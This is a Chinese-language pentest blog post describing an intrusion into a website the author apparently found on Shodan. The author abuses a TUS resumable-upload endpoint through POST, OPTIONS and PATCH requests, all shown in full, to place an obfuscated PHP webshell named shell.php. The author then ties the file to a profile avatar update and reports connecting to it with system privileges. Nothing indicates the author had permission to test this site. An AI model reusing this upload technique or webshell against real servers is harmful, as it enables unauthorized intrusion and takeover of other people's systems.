一次使用了OPTIONS PATCH的文件上传
in Study on Pentest
记一次有点神奇的文件上传到 最后拿到了system权限
信息收集
趁着shodan打折 4刀买了个membership 看看有没有什么好玩的站 于是发现了这个目标
机器开放端口很多 21 80 443 1935 8080 8083 8086 8087 8089 每个端口都开放了服务 而且随手测试下 就发现了sql注入 目录遍历的问题
SQL注入
这网站离谱到https://**/index.php?i=aviso-legal
这种地方都可以存在注入 但是sqlmap跑了下也没找到什么有用的信息 连用户表都没有
文件上传
于是开始寻找新的突破点 注册了个用户 查看头像上传处的包记录 发现以下操作
POST
POST /files/ HTTP/1.1
Host: server-***.***-**********.com:8085
Connection: close
Content-Length: 0
sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88"
Tus-Resumable: 1.0.0
Upload-Length: 874
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Upload-Metadata: relativePath bnVsbA==,name bWEucGhw,type cGhw,filetype cGhw,filename bWEucGhw
Accept: */*
Origin: https://**.*.***.*
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://**.*.***.*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
HTTP/1.0 201 Created
Date: Wed, 31 Mar 2021 08:52:54 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.4.14
X-Powered-By: PHP/7.4.14
X-Content-Type-Options: nosniff
Tus-Resumable: 1.0.0
Access-Control-Allow-Origin: https://**.*.***.*
Access-Control-Allow-Methods: GET,POST,PATCH,DELETE,HEAD,OPTIONS
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Content-Length, Upload-Key, Upload-Checksum, Upload-Length, Upload-Offset, Tus-Version, Tus-Resumable, Upload-Metadata
Access-Control-Expose-Headers: Upload-Key, Upload-Checksum, Upload-Length, Upload-Offset, Upload-Metadata, Tus-Version, Tus-Resumable, Tus-Extension, Location
Access-Control-Max-Age: 86400
Location: https://server-***.***-**********.com:8085/files/60643866c0e06_TUS_a091a937-2a11-49a9-8a98-0a85b3f99832
Upload-Expires: Thu, 01 Apr 2021 10:52:54 GMT
Cache-Control: no-cache, private
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
OPTIONS
OPTIONS /files/60643866c0e06_TUS_a091a937-2a11-49a9-8a98-0a85b3f99832 HTTP/1.1
Host: server-***.***-**********.com:8085
Connection: close
Accept: */*
Access-Control-Request-Method: PATCH
Access-Control-Request-Headers: content-type,tus-resumable,upload-offset
Origin: https://**.*.***.*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
Sec-Fetch-Dest: empty
Referer: https://**.*.***.*/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
HTTP/1.0 200 OK
Date: Wed, 31 Mar 2021 08:53:06 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.4.14
X-Powered-By: PHP/7.4.14
X-Content-Type-Options: nosniff
Tus-Resumable: 1.0.0
Access-Control-Allow-Origin: https://**.*.***.*
Access-Control-Allow-Methods: GET,POST,PATCH,DELETE,HEAD,OPTIONS
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Content-Length, Upload-Key, Upload-Checksum, Upload-Length, Upload-Offset, Tus-Version, Tus-Resumable, Upload-Metadata
Access-Control-Expose-Headers: Upload-Key, Upload-Checksum, Upload-Length, Upload-Offset, Upload-Metadata, Tus-Version, Tus-Resumable, Tus-Extension, Location
Access-Control-Max-Age: 86400
Allow: GET,POST,PATCH,DELETE,HEAD,OPTIONS
Tus-Version: 1.0.0
Tus-Extension: creation,termination,checksum,expiration,concatenation
Tus-Checksum-Algorithm: md2,md4,md5,sha1,sha224,sha256,sha384,sha512/224,sha512/256,sha512,sha3-224,sha3-256,sha3-384,sha3-512,ripemd128,ripemd160,ripemd256,ripemd320,whirlpool,'tiger128,3','tiger160,3','tiger192,3','tiger128,4','tiger160,4','tiger192,4',snefru,snefru256,gost,gost-crypto,adler32,crc32,crc32b,crc32c,fnv132,fnv1a32,fnv164,fnv1a64,joaat,'haval128,3','haval160,3','haval192,3','haval224,3','haval256,3','haval128,4','haval160,4','haval192,4','haval224,4','haval256,4','haval128,5','haval160,5','haval192,5','haval224,5','haval256,5'
Cache-Control: no-cache, private
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
PATCH
PATCH /files/60643866c0e06_TUS_a091a937-2a11-49a9-8a98-0a85b3f99832 HTTP/1.1
Host: server-***.***-**********.com:8085
Connection: close
Content-Length: 611
sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88"
Tus-Resumable: 1.0.0
Upload-Offset: 0
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Content-Type: application/offset+octet-stream
Accept: */*
Origin: https://**.*.***.*
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://**.*.***.*/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
<?php $GAvo=create_function(base64_decode('****').chr(****-****).chr(0x1406d/0x2e3).base64_decode('bQ==').chr(01173-01026),str_rot13('r').str_rot13('i').chr(0x8c32/0x172).base64_decode('bA==').str_rot13('(').chr(450-414).chr(0426-0243).base64_decode('bw==').chr(0x1e7-0x17a).chr(0x247-0x1e2).chr(0x3bbd/0x175).chr(0x199-0x15e));$GAvo(base64_decode('*****'.'*****'.'*****'.'*****'.''.chr(70635/831).str_rot13('R').str_rot13('9').str_rot13('G').chr(******/0x20b).''.''.chr(444-374).base64_decode('dA==').chr(0xc044/*****).str_rot13('H').base64_decode('bQ==').''.'*****'.'*****'.'*****'.'*****'.'*****'.'='.''));?>
POST
POST /*****/****/****.********.php HTTP/1.1
Host: **.*.***.*
Connection: close
Content-Length: 1243
sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88"
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://**.*.***.*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://**.*.***.*/*****/usuario/usuario.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=h2ff7e493gj93kdnqtgm3obvbk; _ga=GA1.1.93787588.1617172029; _gid=GA1.1.1489684397.1617172029
accion=upload-update-caller&mysql-tb-update=tb_usuario&mysql-entidad-id=10733&mysql-entidad-valor-anterior=URL_Avatar&upload-data=%7b%22source%22%3a%22Dashboard%22%2c%22id%22%3a%22****-maphppng-image%2fpng-874-1617159102348%22%2c%22name%22%3a%22shell.php%22%2c%22extension%22%3a%22php%22%2c%22meta%22%3a%7b%22relativePath%22%3a%2260643866c0e06_TUS_a091a937-2a11-49a9-8a98-0a85b3f99832%2f%22%2c%22name%22%3a%22shell.php%22%2c%22type%22%3a%22php%22%7d%2c%22type%22%3a%22php%22%2c%22data%22%3a%7b%7d%2c%22progress%22%3a%7b%22uploadStarted%22%3a1617173830418%2c%22uploadComplete%22%3atrue%2c%22percentage%22%3a100%2c%22bytesUploaded%22%3a874%2c%22bytesTotal%22%3a874%7d%2c%22size%22%3a874%2c%22isRemote%22%3afalse%2c%22remote%22%3a%22%22%2c%22tus%22%3a%7b%22uploadUrl%22%3a%22https%3a%2f%2fserver-***.***-**********.com%3a8085%2ffiles%2f60643866c0e06_TUS_a091a937-2a11-49a9-8a98-0a85b3f99832%22%7d%2c%22response%22%3a%7b%22uploadURL%22%3a%22https%3a%2f%2fserver-***.***-**********.com%3a8085%2ffiles%2f60643866c0e06_TUS_a091a937-2a11-49a9-8a98-0a85b3f99832%22%7d%2c%22uploadURL%22%3a%22https%3a%2f%2fserver-***.***-**********.com%3a8085%2fuploads%2f****%2f60643866c0e06_TUS_a091a937-2a11-49a9-8a98-0a85b3f99832%2fshell.php%22%2c%22isPaused%22%3afalse%7d
HTTP/1.1 200 OK
Date: Wed, 31 Mar 2021 08:53:41 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.4.14
X-Powered-By: PHP/7.4.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 223
Connection: close
Content-Type: application/json
{"estado":"OK","tb_usuario":10733,"objFichero":{"Fichero_ID":10733,"Titulo":"shell.php","RutaWeb":"https:\/\/server-***.***-**********.com:8085\/uploads\/****\/60643866c0e06_TUS_a091a937-2a11-49a9-8a98-0a85b3f99832\/shell.php"}}
成功上传shell并连接
